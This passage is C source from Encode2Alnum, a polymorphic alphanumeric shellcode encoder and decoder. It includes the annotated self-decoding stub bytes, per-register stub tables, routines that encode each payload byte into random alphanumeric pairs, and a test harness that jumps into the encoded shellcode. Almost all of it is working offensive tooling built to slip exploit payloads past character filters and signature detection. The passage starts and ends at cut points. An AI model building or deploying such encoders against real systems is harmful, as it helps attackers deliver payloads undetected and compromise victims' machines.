INC_EDX 'B' #define INC_ESI 'F' #define INC_EDI 'G' #define INC_EBP 'E' #define INC_ESP 'D' #define DEC_EAX 'H' #define DEC_EBX 'K' #define DEC_ECX 'I' #define DEC_EDX 'J' #define DEC_ESI 'N' #define DEC_EDI 'O' #define DEC_EBP 'M' #define DEC_ESP 'L' //////////////////////////////////////////////////////////////////////////// void ComputeEncodingCount(BYTE OriginalByte); #ifdef TESTING void TestStubs(BYTE *EncodedShellcode); BYTE DecodeToByte(BYTE *EncodedByte); #endif BOOL EncodeTo2Bytes(BYTE OriginalByte, BYTE *EncodedByte); void RandomizeStub(BYTE *Stub, DWORD StubLength); BOOL RandomizeDecoder(BYTE *Buffer, DWORD Length); int GetStubLength(); BOOL CopyStub(BYTE *OutEncodedShellcode, DWORD StubLength); BYTE *Encode2Alnum(char *input_reg, BYTE *OriginalShellcode, DWORD OriginalShellcodeLength, BOOL Verbose); //////////////////////////////////////////////////////////////////////////// extern BYTE Key; extern BYTE Terminator; extern BYTE g_Decoder[]; extern BYTE *EncodedShellcode; extern DWORD EncodedShellcodeLength; extern BYTE EncodingCounts[256]; extern int hardcoded_address; extern int reg_type; extern int reg_indirect; extern int reg_offset; extern int reg_negative; extern BYTE HardcodedAddressStub[]; extern BYTE HardcodedAddressIndirectStub[]; extern BYTE EAXStub[]; extern BYTE EBXStub[]; extern BYTE ECXStub[]; extern BYTE EDXStub[]; extern BYTE ESIStub[]; extern BYTE EDIStub[]; extern BYTE EBPStub[]; extern BYTE ESPStub[]; extern BYTE PreEAXPositiveOffsetStub[]; extern BYTE PreEBXPositiveOffsetStub[]; extern BYTE PreECXPositiveOffsetStub[]; extern BYTE PreEDXPositiveOffsetStub[]; extern BYTE PreESIPositiveOffsetStub[]; extern BYTE PreEDIPositiveOffsetStub[]; extern BYTE PreEBPPositiveOffsetStub[]; extern BYTE PreESPPositiveOffsetStub[]; extern BYTE PostEAXPositiveOffsetStub[]; extern BYTE PostEBXPositiveOffsetStub[]; extern BYTE PostECXPositiveOffsetStub[]; extern BYTE PostEDXPositiveOffsetStub[]; extern BYTE PostESIPositiveOffsetStub[]; extern BYTE PostEDIPositiveOffsetStub[]; extern BYTE PostEBPPositiveOffsetStub[]; extern BYTE PostESPPositiveOffsetStub[]; extern BYTE PreEAXNegativeOffsetStub[]; extern BYTE PreEBXNegativeOffsetStub[]; extern BYTE PreECXNegativeOffsetStub[]; extern BYTE PreEDXNegativeOffsetStub[]; extern BYTE PreESINegativeOffsetStub[]; extern BYTE PreEDINegativeOffsetStub[]; extern BYTE PreEBPNegativeOffsetStub[]; extern BYTE PreESPNegativeOffsetStub[]; extern BYTE PostEAXNegativeOffsetStub[]; extern BYTE PostEBXNegativeOffsetStub[]; extern BYTE PostECXNegativeOffsetStub[]; extern BYTE PostEDXNegativeOffsetStub[]; extern BYTE PostESINegativeOffsetStub[]; extern BYTE PostEDINegativeOffsetStub[]; extern BYTE PostEBPNegativeOffsetStub[]; extern BYTE PostESPNegativeOffsetStub[]; extern BYTE EAXIndirectStub[]; extern BYTE EBXIndirectStub[]; extern BYTE ECXIndirectStub[]; extern BYTE EDXIndirectStub[]; extern BYTE ESIIndirectStub[]; extern BYTE EDIIndirectStub[]; extern BYTE EBPIndirectStub[]; extern BYTE ESPIndirectStub[]; extern BYTE PreEAXIndirectPositiveOffsetStub[]; extern BYTE PreEBXIndirectPositiveOffsetStub[]; extern BYTE PreECXIndirectPositiveOffsetStub[]; extern BYTE PreEDXIndirectPositiveOffsetStub[]; extern BYTE PreESIIndirectPositiveOffsetStub[]; extern BYTE PreEDIIndirectPositiveOffsetStub[]; extern BYTE PreEBPIndirectPositiveOffsetStub[]; extern BYTE PreESPIndirectPositiveOffsetStub[]; extern BYTE PostEAXIndirectPositiveOffsetStub[]; extern BYTE PostEBXIndirectPositiveOffsetStub[]; extern BYTE PostECXIndirectPositiveOffsetStub[]; extern BYTE PostEDXIndirectPositiveOffsetStub[]; extern BYTE PostESIIndirectPositiveOffsetStub[]; extern BYTE PostEDIIndirectPositiveOffsetStub[]; extern BYTE PostEBPIndirectPositiveOffsetStub[]; extern BYTE PostESPIndirectPositiveOffsetStub[]; extern BYTE PreEAXIndirectNegativeOffsetStub[]; extern BYTE PreEBXIndirectNegativeOffsetStub[]; extern BYTE PreECXIndirectNegativeOffsetStub[]; extern BYTE PreEDXIndirectNegativeOffsetStub[]; extern BYTE PreESIIndirectNegativeOffsetStub[]; extern BYTE PreEDIIndirectNegativeOffsetStub[]; extern BYTE PreEBPIndirectNegativeOffsetStub[]; extern BYTE PreESPIndirectNegativeOffsetStub[]; extern BYTE PostEAXIndirectNegativeOffsetStub[]; extern BYTE PostEBXIndirectNegativeOffsetStub[]; extern BYTE PostECXIndirectNegativeOffsetStub[]; extern BYTE PostEDXIndirectNegativeOffsetStub[]; extern BYTE PostESIIndirectNegativeOffsetStub[]; extern BYTE PostEDIIndirectNegativeOffsetStub[]; extern BYTE PostEBPIndirectNegativeOffsetStub[]; extern BYTE PostESPIndirectNegativeOffsetStub[]; #endif // ENC2ALNUM_H === enc2alnum/decoder.c // Encode2Alnum (polymorphic alphanumeric decoder/encoder) // Copyright (C) 2003-2004, Matt Conover, Avri Schneider and Soren Macbeth #include "enc2alnum.h" /* // edx points to shellcode start Z 01: pop edx // set eax to 0xffffffff h!!!! 02: push XORA X 03: pop eax 5!!!! 04: xor eax,XORA H 05: dec eax // change line 22 to jnz 4C 06: xor al,43h 0B6 07: xor byte ptr [edx+36h],al // set ecx to point to shellcode R 08: push edx Y 09: pop ecx kA7@ 10: imul eax,dword ptr [ecx+37h],KEY A 11: inc ecx 3A7 12: xor eax,dword ptr [ecx+37h] A 13: inc ecx 2B7 14: xor al,byte ptr [edx+37h] 0B7 15: xor byte ptr [edx+37h],al B 16: inc edx h!!!! 17: push XORB X 18: pop eax 5!!!! 19: xor eax,XORB 4_ 20: xor al,TERMINATOR 8A7 21: cmp byte ptr [ecx+37h],al ub 22: jne _OriginalShellcode+5Eh // changed by lines 4 and 5 _ = terminator @ = key !!!! = XOR_VALUES */ // 555554444444444333333333322222222221111111111000000000 // 432109876543210987654321098765432109876543210987654321 BYTE g_Decoder[] = "Zh!!!!X5!!!!H4C0B6RYkA7 at A3A7A2B70B7Bh!!!!X5!!!!4_8A7ub"; BYTE EncodingCounts[256]; // Count how many possible encodings there are void ComputeEncodingCount(BYTE OriginalByte) { BYTE EncodedByte1, EncodedByte2, OriginalByte2; int matched = 0; for (EncodedByte1 = '0'; EncodedByte1 <= 'z'; EncodedByte1++) { if (!isalnum(EncodedByte1) || (EncodedByte1 == Terminator)) continue; for (EncodedByte2 = '0'; EncodedByte2 <= 'z'; EncodedByte2++) { if (!isalnum(EncodedByte2) || (EncodedByte2 == Terminator)) continue; OriginalByte2 = EncodedByte1 * Key; OriginalByte2 ^= EncodedByte2; if (OriginalByte == OriginalByte2) matched++; } } EncodingCounts[OriginalByte] = matched; } #ifdef TESTING BYTE DecodeToByte(BYTE *EncodedByte) { BYTE DecodedByte; DecodedByte = EncodedByte[0] * Key; DecodedByte ^= EncodedByte[1]; return DecodedByte; } #endif BOOL EncodeTo2Bytes(BYTE OriginalByte, BYTE *EncodedByte) { BYTE EncodedByte1, EncodedByte2, OriginalByte2; int matched = 0, randcount; if (!EncodingCounts[OriginalByte]) { fprintf(stderr, "Can't encode 0x%02x\n", OriginalByte); return FALSE; } // Chose a random encoding for this byte randcount = rand() % EncodingCounts[OriginalByte] + 1; for (EncodedByte1 = '0'; EncodedByte1 <= 'z'; EncodedByte1++) { if (!isalnum(EncodedByte1) || (EncodedByte1 == Terminator)) continue; for (EncodedByte2 = '0'; EncodedByte2 <= 'z'; EncodedByte2++) { if (!isalnum(EncodedByte2) || (EncodedByte2 == Terminator)) continue; OriginalByte2 = EncodedByte1 * Key; OriginalByte2 ^= EncodedByte2; if (OriginalByte == OriginalByte2) { matched++; if (matched != randcount) continue; EncodedByte[0] = EncodedByte1; EncodedByte[1] = EncodedByte2; return TRUE; } } } return FALSE; } === enc2alnum/stubs.c // Encode2Alnum (polymorphic alphanumeric decoder/encoder) // Copyright (C) 2003-2004, Matt Conover, Avri Schneider and Soren Macbeth #include #include "enc2alnum.h" DWORD StubIndex; REG_STUB g_Stubs[] = { { EAX, EAXStub, PreEAXPositiveOffsetStub, INC_ECX, PostEAXPositiveOffsetStub, PreEAXNegativeOffsetStub, DEC_EAX, PostEAXNegativeOffsetStub, EAXIndirectStub, PreEAXIndirectPositiveOffsetStub, INC_ECX, PostEAXIndirectPositiveOffsetStub, PreEAXIndirectNegativeOffsetStub, DEC_EAX, PostEAXIndirectNegativeOffsetStub }, { EBX, EBXStub, PreEBXPositiveOffsetStub, INC_EBX, PostEBXPositiveOffsetStub, PreEBXNegativeOffsetStub, DEC_EBX, PostEBXNegativeOffsetStub, EBXIndirectStub, PreEBXIndirectPositiveOffsetStub, INC_EBX, PostEBXIndirectPositiveOffsetStub, PreEBXIndirectNegativeOffsetStub, DEC_EBX, PostEBXIndirectNegativeOffsetStub }, { ECX, ECXStub, PreECXPositiveOffsetStub, INC_ECX, PostECXPositiveOffsetStub, PreECXNegativeOffsetStub, DEC_ECX, PostECXNegativeOffsetStub, ECXIndirectStub, PreECXIndirectPositiveOffsetStub, INC_ECX, PostECXIndirectPositiveOffsetStub, PreECXIndirectNegativeOffsetStub, DEC_ECX, PostECXIndirectNegativeOffsetStub }, { EDX, EDXStub, PreEDXPositiveOffsetStub, INC_EDX, PostEDXPositiveOffsetStub, PreEDXNegativeOffsetStub, DEC_EDX, PostEDXNegativeOffsetStub, EDXIndirectStub, PreEDXIndirectPositiveOffsetStub, INC_EDX, PostEDXIndirectPositiveOffsetStub, PreEDXIndirectNegativeOffsetStub, DEC_EDX, PostEDXIndirectNegativeOffsetStub }, { ESI, ESIStub, PreESIPositiveOffsetStub, INC_ESI, PostESIPositiveOffsetStub, PreESINegativeOffsetStub, DEC_ESI, PostESINegativeOffsetStub, ESIIndirectStub, PreESIIndirectPositiveOffsetStub, INC_ESI, PostESIIndirectPositiveOffsetStub, PreESIIndirectNegativeOffsetStub, DEC_ESI, PostESIIndirectNegativeOffsetStub }, { EDI, EDIStub, PreEDIPositiveOffsetStub, INC_EDI, PostEDIPositiveOffsetStub, PreEDINegativeOffsetStub, DEC_EDI, PostEDINegativeOffsetStub, EDIIndirectStub, PreEDIIndirectPositiveOffsetStub, INC_EDI, PostEDIIndirectPositiveOffsetStub, PreEDIIndirectNegativeOffsetStub, DEC_EDI, PostEDIIndirectNegativeOffsetStub }, { EBP, EBPStub, PreEBPPositiveOffsetStub, INC_EBP, PostEBPPositiveOffsetStub, PreEBPNegativeOffsetStub, DEC_EBP, PostEBPNegativeOffsetStub, EBPIndirectStub, PreEBPIndirectPositiveOffsetStub, INC_EBP, PostEBPIndirectPositiveOffsetStub, PreEBPIndirectNegativeOffsetStub, DEC_EBP, PostEBPIndirectNegativeOffsetStub }, { ESP, ESPStub, PreESPPositiveOffsetStub, INC_ESP, PostESPPositiveOffsetStub, PreESPNegativeOffsetStub, DEC_ESP, PostESPNegativeOffsetStub, ESPIndirectStub, PreESPIndirectPositiveOffsetStub, INC_ESP, PostESPIndirectPositiveOffsetStub, PreESPIndirectNegativeOffsetStub, DEC_ESP, PostESPIndirectNegativeOffsetStub }, { HARDCODED, HardcodedAddressStub, NULL, 0, NULL, NULL, 0, NULL, HardcodedAddressIndirectStub, NULL, 0, NULL, NULL, 0, NULL }, // Last entry { INVALID, NULL, NULL, 0, NULL, NULL, 0, NULL, NULL, NULL, 0, NULL, NULL, 0, NULL } }; // Handle case that address points to shellcode // hardcoded_address != 0, reg_type = 0 BYTE HardcodedAddressStub[] = "hADDR"; // Handle case that address points to a pointer to shellcode // hardcoded_address != 0, reg_type = 0 BYTE HardcodedAddressIndirectStub[] = "hADDRYQh!!!!X*****P*a30VX5!!!!P"; // Handle case that reg points to shellcode // reg_indirect = 0 and reg_offset = 0 // reg BYTE EAXStub[] = "P"; // push eax BYTE EBXStub[] = "S"; // push ebx BYTE ECXStub[] = "Q"; // push ecx BYTE EDXStub[] = "R"; // push edx BYTE ESIStub[] = "V"; // push esi BYTE EDIStub[] = "W"; // push edi BYTE EBPStub[] = "U"; // push ebp BYTE ESPStub[] = "T"; // push esp // Handle case that [reg] points to shellcode // reg_indirect and reg_offset = 0 // [reg] BYTE EAXIndirectStub[] = "Ph!!!!X*****P*a30VX5!!!!P"; BYTE EBXIndirectStub[] = "Sh!!!!X*****P*a30VX5!!!!P"; BYTE ECXIndirectStub[] = "Qh!!!!X*****P*a30VX5!!!!P"; BYTE EDXIndirectStub[] = "Rh!!!!X*****P*a30VX5!!!!P"; BYTE ESIIndirectStub[] = "Vh!!!!X*****P*a30VX5!!!!P"; BYTE EDIIndirectStub[] = "Wh!!!!X*****P*a30VX5!!!!P"; BYTE EBPIndirectStub[] = "Uh!!!!X*****P*a30VX5!!!!P"; BYTE ESPIndirectStub[] = ""; // no more is needed // Handle case that reg+offset points to shellcode // reg_indirect = 0 and reg_offset > 0 and reg_negative = 0 // reg+off BYTE PreEAXPositiveOffsetStub[] = "PY"; // inc eax is not possible, so do push eax; pop ecx BYTE PreEBXPositiveOffsetStub[] = ""; // no more is needed BYTE PreECXPositiveOffsetStub[] = ""; // no more is needed BYTE PreEDXPositiveOffsetStub[] = ""; // no more is needed BYTE PreESIPositiveOffsetStub[] = ""; // no more is needed BYTE PreEDIPositiveOffsetStub[] = ""; // no more is needed BYTE PreEBPPositiveOffsetStub[] = ""; // no more is needed BYTE PreESPPositiveOffsetStub[] = ""; // no more is needed BYTE PostEAXPositiveOffsetStub[] = "Q"; // do push ecx BYTE PostEBXPositiveOffsetStub[] = "S"; // no more is needed BYTE PostECXPositiveOffsetStub[] = "Q"; // no more is needed BYTE PostEDXPositiveOffsetStub[] = "R"; // no more is needed BYTE PostESIPositiveOffsetStub[] = "V"; // no more is needed BYTE PostEDIPositiveOffsetStub[] = "W"; // no more is needed BYTE PostEBPPositiveOffsetStub[] = "U"; // no more is needed BYTE PostESPPositiveOffsetStub[] = "T"; // no more is needed // Handle case that reg-offset points to shellcode // reg_indirect = 0 and reg_offset > 0 and reg_negative = 1 // reg-off BYTE PreEAXNegativeOffsetStub[] = ""; // no more is needed BYTE PreEBXNegativeOffsetStub[] = ""; // no more is needed BYTE PreECXNegativeOffsetStub[] = ""; // no more is needed BYTE PreEDXNegativeOffsetStub[] = ""; // no more is needed BYTE PreESINegativeOffsetStub[] = ""; // no more is needed BYTE PreEDINegativeOffsetStub[] = ""; // no more is needed BYTE PreEBPNegativeOffsetStub[] = ""; // no more is needed BYTE PreESPNegativeOffsetStub[] = ""; // no more is needed BYTE PostEAXNegativeOffsetStub[] = "P"; BYTE PostEBXNegativeOffsetStub[] = "S"; BYTE PostECXNegativeOffsetStub[] = "Q"; BYTE PostEDXNegativeOffsetStub[] = "R"; BYTE PostESINegativeOffsetStub[] = "V"; BYTE PostEDINegativeOffsetStub[] = "W"; BYTE PostEBPNegativeOffsetStub[] = "U"; BYTE PostESPNegativeOffsetStub[] = "T"; // this needs special handling // Handle case that reg+offset points to shellcode // reg_indirect = 1 and reg_offset > 0 and reg_negative = 0 // [reg+off] BYTE PreEAXIndirectPositiveOffsetStub[] = "PY"; // inc eax is not alphanumeric, so do push eax; pop ecx BYTE PreEBXIndirectPositiveOffsetStub[] = ""; // no more is needed BYTE PreECXIndirectPositiveOffsetStub[] = ""; // no more is needed BYTE PreEDXIndirectPositiveOffsetStub[] = ""; // no more is needed BYTE PreESIIndirectPositiveOffsetStub[] = ""; // no more is needed BYTE PreEDIIndirectPositiveOffsetStub[] = ""; // no more is needed BYTE PreEBPIndirectPositiveOffsetStub[] = ""; // no more is needed BYTE PreESPIndirectPositiveOffsetStub[] = ""; // no more is needed BYTE PostEAXIndirectPositiveOffsetStub[] = "Qh!!!!X*****P*a30VX5!!!!P"; // do same as ecx case BYTE PostEBXIndirectPositiveOffsetStub[] = "Sh!!!!X*****P*a30VX5!!!!P"; BYTE PostECXIndirectPositiveOffsetStub[] = "Qh!!!!X*****P*a30VX5!!!!P"; BYTE PostEDXIndirectPositiveOffsetStub[] = "Rh!!!!X*****P*a30VX5!!!!P"; BYTE PostESIIndirectPositiveOffsetStub[] = "Vh!!!!X*****P*a30VX5!!!!P"; BYTE PostEDIIndirectPositiveOffsetStub[] = "Wh!!!!X*****P*a30VX5!!!!P"; BYTE PostEBPIndirectPositiveOffsetStub[] = "Uh!!!!X*****P*a30VX5!!!!P"; BYTE PostESPIndirectPositiveOffsetStub[] = ""; // no more is needed // Handle case that reg-offset points to shellcode // reg_indirect = 1 and reg_offset > 0 and reg_negative = 1 // [reg-off] BYTE PreEAXIndirectNegativeOffsetStub[] = ""; // no more is needed BYTE PreEBXIndirectNegativeOffsetStub[] = ""; // no more is needed BYTE PreECXIndirectNegativeOffsetStub[] = ""; // no more is needed BYTE PreEDXIndirectNegativeOffsetStub[] = ""; // no more is needed BYTE PreESIIndirectNegativeOffsetStub[] = ""; // no more is needed BYTE PreEDIIndirectNegativeOffsetStub[] = ""; // no more is needed BYTE PreEBPIndirectNegativeOffsetStub[] = ""; // no more is needed BYTE PreESPIndirectNegativeOffsetStub[] = ""; // no more is needed BYTE PostEAXIndirectNegativeOffsetStub[] = "Ph!!!!X*****P*a30VX5!!!!P"; BYTE PostEBXIndirectNegativeOffsetStub[] = "Sh!!!!X*****P*a30VX5!!!!P"; BYTE PostECXIndirectNegativeOffsetStub[] = "Qh!!!!X*****P*a30VX5!!!!P"; BYTE PostEDXIndirectNegativeOffsetStub[] = "Rh!!!!X*****P*a30VX5!!!!P"; BYTE PostESIIndirectNegativeOffsetStub[] = "Vh!!!!X*****P*a30VX5!!!!P"; BYTE PostEDIIndirectNegativeOffsetStub[] = "Wh!!!!X*****P*a30VX5!!!!P"; BYTE PostEBPIndirectNegativeOffsetStub[] = "Uh!!!!X*****P*a30VX5!!!!P"; BYTE PostESPIndirectNegativeOffsetStub[] = ""; // no more is needed int FindStubIndex() { int i; for (i = 0; g_Stubs[i].RegType != INVALID; i++) { if (g_Stubs[i].RegType == reg_type) return i; } return -1; } BOOL GetStubLength() { int StubIndex; DWORD StubLength; StubIndex = FindStubIndex(); if (StubIndex < 0) { assert(0); return 0; } if (!reg_indirect) // direct { if (!reg_offset) StubLength = strlen(g_Stubs[StubIndex].DirectStub); else // reg_offset { if (!reg_negative) StubLength = strlen(g_Stubs[StubIndex].PreDirectPositiveOffsetStub) + reg_offset + strlen(g_Stubs[StubIndex].PostDirectPositiveOffsetStub); else StubLength = strlen(g_Stubs[StubIndex].PreDirectNegativeOffsetStub) + reg_offset + strlen(g_Stubs[StubIndex].PostDirectNegativeOffsetStub); } } else // indirect { if (!reg_offset) StubLength = strlen(g_Stubs[StubIndex].IndirectStub); else // reg_offset { if (!reg_negative) StubLength = strlen(g_Stubs[StubIndex].PreIndirectPositiveOffsetStub) + reg_offset + strlen(g_Stubs[StubIndex].PostIndirectPositiveOffsetStub); else StubLength = strlen(g_Stubs[StubIndex].PreIndirectNegativeOffsetStub) + reg_offset + strlen(g_Stubs[StubIndex].PostIndirectNegativeOffsetStub); } } return StubLength; } BOOL CopyStub(BYTE *OutEncodedShellcode, DWORD StubLength) { int StubIndex; BYTE *InStub; DWORD StubOffset, *pAddress; assert(StubLength); if (!StubLength) return FALSE; StubIndex = FindStubIndex(); if (StubIndex < 0) { assert(0); return FALSE; } if (!reg_indirect) // direct { if (!reg_offset) { InStub = g_Stubs[StubIndex].DirectStub; if (hardcoded_address) { pAddress = (DWORD *)(InStub+1); *pAddress = hardcoded_address; } memcpy(OutEncodedShellcode, InStub, StubLength); } else // reg_offset { if (!reg_negative) // positive { InStub = g_Stubs[StubIndex].PreDirectPositiveOffsetStub; memcpy(OutEncodedShellcode, InStub, strlen(InStub)); StubOffset = strlen(InStub); memset(OutEncodedShellcode+StubOffset, g_Stubs[StubIndex].DirectPositiveOffsetOpcode, reg_offset); StubOffset += reg_offset; InStub = g_Stubs[StubIndex].PostDirectPositiveOffsetStub; memcpy(OutEncodedShellcode+StubOffset, InStub, strlen(InStub)); } else // negative { InStub = g_Stubs[StubIndex].PreDirectNegativeOffsetStub; memcpy(OutEncodedShellcode, InStub, strlen(InStub)); StubOffset = strlen(InStub); memset(OutEncodedShellcode+StubOffset, g_Stubs[StubIndex].DirectNegativeOffsetOpcode, reg_offset); StubOffset += reg_offset; InStub = g_Stubs[StubIndex].PostDirectNegativeOffsetStub; memcpy(OutEncodedShellcode+StubOffset, InStub, strlen(InStub)); } } } else // indirect { if (!reg_offset) { InStub = g_Stubs[StubIndex].IndirectStub; if (hardcoded_address) { pAddress = (DWORD *)(InStub+1); *pAddress = hardcoded_address; } memcpy(OutEncodedShellcode, InStub, StubLength); } else // reg_offset { if (!reg_negative) // positive { InStub = g_Stubs[StubIndex].PreIndirectPositiveOffsetStub; memcpy(OutEncodedShellcode, InStub, strlen(InStub)); StubOffset = strlen(InStub); memset(OutEncodedShellcode+StubOffset, g_Stubs[StubIndex].IndirectPositiveOffsetOpcode, reg_offset); StubOffset += reg_offset; InStub = g_Stubs[StubIndex].PostIndirectPositiveOffsetStub; memcpy(OutEncodedShellcode+StubOffset, InStub, strlen(InStub)); } else // negative { InStub = g_Stubs[StubIndex].PreIndirectNegativeOffsetStub; memcpy(OutEncodedShellcode, InStub, strlen(InStub)); StubOffset = strlen(InStub); memset(OutEncodedShellcode+StubOffset, g_Stubs[StubIndex].IndirectNegativeOffsetOpcode, reg_offset); StubOffset += reg_offset; InStub = g_Stubs[StubIndex].PostIndirectNegativeOffsetStub; memcpy(OutEncodedShellcode+StubOffset, InStub, strlen(InStub)); } } } RandomizeDecoder(OutEncodedShellcode, StubLength); assert(strlen(OutEncodedShellcode) == StubLength); return TRUE; } #ifdef TESTING void TestStubs(BYTE *EncodedShellcode) { char **pEncodedShellcode; printf("Testing shellcode\n"); pEncodedShellcode = &EncodedShellcode; if (hardcoded_address) { if (!reg_indirect) { memcpy((DWORD *)hardcoded_address, EncodedShellcode, EncodedShellcodeLength); _asm { //int 3 mov eax, hardcoded_address jmp eax } } else { _asm { //int 3 mov eax, hardcoded_address mov ebx, EncodedShellcode mov [eax], ebx jmp ebx } } } else if (reg_type == EAX) { if (!reg_indirect) { if (!reg_offset) // "eax" { _asm { //int 3 mov eax, EncodedShellcode jmp EncodedShellcode } } else { if (reg_negative) // "eax-off" { _asm { int 3 mov eax, EncodedShellcode add eax, reg_offset jmp EncodedShellcode } } else // "eax+off" { _asm { int 3 mov eax, EncodedShellcode sub eax, reg_offset jmp EncodedShellcode } } } } else { if (!reg_offset) // "[eax]" { _asm { int 3 mov eax, pEncodedShellcode jmp EncodedShellcode } } else { if (reg_negative) // "[eax-off]" { _asm { int 3 mov eax, pEncodedShellcode add eax, reg_offset jmp EncodedShellcode } } else // "[eax+off]" { _asm { int 3 mov eax, pEncodedShellcode sub eax, reg_offset jmp EncodedShellcode } } } } } else if (reg_type == EBX) { if (!reg_indirect) { if (!reg_offset) // "EBX" { _asm { mov ebx, EncodedShellcode jmp EncodedShellcode } } else { if (reg_negative) // "EBX-off" { _asm { int 3 mov ebx, EncodedShellcode add ebx, reg_offset jmp EncodedShellcode } } else // "EBX+off" { _asm { int 3 mov ebx, EncodedShellcode sub ebx, reg_offset jmp EncodedShellcode } } } } else { if (!reg_offset) // "[EBX]" { _asm { int 3 mov ebx, pEncodedShellcode jmp EncodedShellcode } } else { if (reg_negative) // "[EBX-off]" { _asm { int 3 mov ebx, pEncodedShellcode add ebx, reg_offset jmp EncodedShellcode } } else // "[EBX+off]" { _asm { int 3 mov ebx, pEncodedShellcode sub ebx, reg_offset jmp EncodedShellcode } } } } } else if (reg_type == ECX) { if (!reg_indirect) { if (!reg_offset) // "ECX" { _asm { mov ecx, EncodedShellcode jmp ecx } } else { if (reg_negative) // "ECX-off" { _asm { //int 3 mov ecx, EncodedShellcode add ecx, reg_offset jmp EncodedShellcode } } else // "ECX+off" { _asm { //int 3 mov ecx, EncodedShellcode sub ecx, reg_offset jmp EncodedShellcode } } } } else { if (!reg_offset) // "[ECX]" { _asm { mov ecx, pEncodedShellcode jmp EncodedShellcode } } else { if (reg_negative) // "[ECX-off]" { _asm { mov ecx, pEncodedShellcode add ecx, reg_offset jmp EncodedShellcode } } else // "[ECX+off]" { _asm { mov ecx, pEncodedShellcode sub ecx, reg_offset jmp EncodedShellcode } } } } } else if (reg_type == EDX) { if (!reg_indirect) { if (!reg_offset) // "EDX" { _asm { mov edx, EncodedShellcode jmp EncodedShellcode } } else { if (reg_negative) // "EDX-off" { _asm { mov edx, EncodedShellcode add edx, reg_offset jmp EncodedShellcode } } else // "EDX+off" { _asm { mov edx, EncodedShellcode sub edx, reg_offset jmp EncodedShellcode } } } } else { if (!reg_offset) // "[EDX]" { _asm { mov edx, pEncodedShellcode jmp EncodedShellcode } } else { if (reg_negative) // "[EDX-off]" { _asm { mov edx, pEncodedShellcode add edx, reg_offset jmp EncodedShellcode } } else // "[EDX+off]" { _asm { mov edx, pEncodedShellcode sub edx, reg_offset jmp EncodedShellcode } } } } } else if (reg_type == ESI) { if (!reg_indirect) { if (!reg_offset) // "ESI" { _asm { mov esi, EncodedShellcode jmp EncodedShellcode } } else { if (reg_negative) // "ESI-off" { _asm { mov esi, EncodedShellcode add esi, reg_offset jmp EncodedShellcode } } else // "ESI+off" { _asm { mov esi, EncodedShellcode sub esi, reg_offset jmp EncodedShellcode } } } } else { if (!reg_offset) // "[ESI]" { _asm { mov esi, pEncodedShellcode jmp EncodedShellcode } } else { if (reg_negative) // "[ESI-off]" { _asm { mov esi, pEncodedShellcode add esi, reg_offset jmp EncodedShellcode } } else // "[ESI+off]" { _asm { mov esi, pEncodedShellcode sub esi, reg_offset jmp EncodedShellcode } } } } } else if (reg_type == EDI) { if (!reg_indirect) { if (!reg_offset) // "EDI" { _asm { mov edi, EncodedShellcode jmp EncodedShellcode } } else { if (reg_negative) // "EDI-off" { _asm { mov edi, EncodedShellcode add edi, reg_offset jmp EncodedShellcode } } else // "EDI+off" { _asm { mov edi, EncodedShellcode sub edi, reg_offset jmp EncodedShellcode } } } } else { if (!reg_offset) // "[EDI]" { _asm { mov edi, pEncodedShellcode jmp EncodedShellcode } } else { if (reg_negative) // "[EDI-off]" { _asm { mov edi, pEncodedShellcode add edi, reg_offset jmp EncodedShellcode } } else // "[EDI+off]" { _asm { mov edi, pEncodedShellcode sub edi, reg_offset jmp EncodedShellcode } } } } } else if (reg_type == EBP) { if (!reg_indirect) { if (!reg_offset) // "EBP" { _asm { mov eax, EncodedShellcode mov ebp, eax jmp eax } } else { if (reg_negative) // "EBP-off" { _asm { mov eax, EncodedShellcode mov ebp, eax add ebp, reg_offset jmp eax } } else // "EBP+off" { _asm { mov eax, EncodedShellcode mov ebp, eax sub ebp, reg_offset jmp eax } } } } else { if (!reg_offset) // "[EBP]" { _asm { mov eax, pEncodedShellcode mov ebp, eax mov eax, [eax] jmp eax } } else { if (reg_negative) // "[EBP-off]" { _asm { //int 3 mov eax, pEncodedShellcode add ebp, reg_offset mov ebp, eax mov eax, pEncodedShellcode jmp eax } } else // "[EBP+off]" { _asm { //int 3 mov eax, pEncodedShellcode sub eax, reg_offset mov ebp, eax mov eax, pEncodedShellcode jmp eax } } } } } else if (reg_type == ESP) { if (!reg_indirect) { if (!reg_offset) // "ESP" { char *tmp; _asm { sub esp, EncodedShellcodeLength mov tmp, esp } memcpy(tmp, EncodedShellcode, EncodedShellcodeLength); _asm { jmp esp } } else { if (reg_negative) // "[ESP-off]" { _asm { //int 3 mov eax, pEncodedShellcode sub esp, reg_offset mov [esp], eax add esp, reg_offset mov eax, EncodedShellcode jmp eax } } else // "[ESP+off]" { _asm { //int 3 sub esp, 4 mov eax, pEncodedShellcode mov [esp], eax sub esp, reg_offset mov eax, EncodedShellcode jmp eax } } } } else { if (!reg_offset) // "[ESP]" { _asm { mov eax, EncodedShellcode push eax jmp EncodedShellcode } } else { if (reg_negative) // "[ESP-off]" { _asm { //int 3 mov eax, EncodedShellcode sub esp, reg_offset push eax add esp, reg_offset jmp EncodedShellcode } } else // "[ESP+off]" { _asm { //int 3 mov eax, pEncodedShellcode push eax sub esp, reg_offset jmp EncodedShellcode } } } } } else { assert(0); } } #endif === enc2alnum/randomize.c // Encode2Alnum (polymorphic alphanumeric decoder/encoder) // Copyright (C) 2003-2004, Matt Conover, Avri Schneider and Soren Macbeth #include #include "enc2alnum.h" RANDOMIZER g_Randomizers[] = { //{ '^', 0, FALSE, ALNUM_CHARSET }, { '*', 0, FALSE, INDIRECT_CHARSET }, { '!', 3, TRUE, INDIRECT_CHARSET }, { 0, 0, FALSE, NULL } }; BYTE Key; BYTE Terminator; BYTE GetRandomByte() { BYTE alnum; do { alnum = RANDOM_ALNUM(); } while (!isalnum(alnum)); return alnum; } void Randomize(BYTE *In, BYTE RandomArray[], DWORD Length) { DWORD i; for (i = 0; i < Length; i++) { In[i] = RandomArray[rand() % strlen(RandomArray)]; } } int FindRandomizerIndex(BYTE RandomizeKey) { int i; for (i = 0; g_Randomizers[i].RandomizeKey != 0; i++) { if (g_Randomizers[i].RandomizeKey == RandomizeKey) return i; } return -1; } BOOL RandomizeDecoder(BYTE *Buffer, DWORD Length) { DWORD i; DWORD RandomizerLength; int Index; DWORD saved_i = 0; BYTE saved_key = 0; BOOL ReplaceNextMatch = FALSE; for (i = 0; i < Length; i++) { if (isalnum(Buffer[i])) continue; if (Buffer[i] == KEY) { Buffer[i] = Key = GetRandomByte(); } else if (Buffer[i] == TERMINATOR) { Buffer[i] = Terminator = GetRandomByte(); } else { Index = 